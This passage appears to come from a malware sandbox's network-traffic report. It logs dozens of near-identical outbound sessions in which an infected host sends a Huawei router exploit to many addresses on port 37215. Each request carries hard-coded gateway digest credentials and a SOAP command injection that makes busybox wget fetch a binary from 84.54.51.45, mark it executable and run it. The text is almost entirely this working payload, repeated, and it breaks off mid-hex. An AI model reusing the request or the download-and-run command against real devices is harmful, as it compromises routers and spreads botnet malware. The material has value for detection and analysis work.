                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1927192.168.2.155497841.41.64.18837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600366116 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1928192.168.2.154349841.181.249.17737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600366116 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1929192.168.2.156067641.62.106.437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600395918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1930192.168.2.155894441.35.67.15237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600405931 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1931192.168.2.155428241.238.174.20837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600409031 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1932192.168.2.155780041.14.211.20037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600450039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1933192.168.2.154640041.133.81.12837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600486994 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1934192.168.2.153398841.3.7.037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600503922 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1935192.168.2.154625641.30.109.637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600536108 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1936192.168.2.153698041.91.48.24537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600562096 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 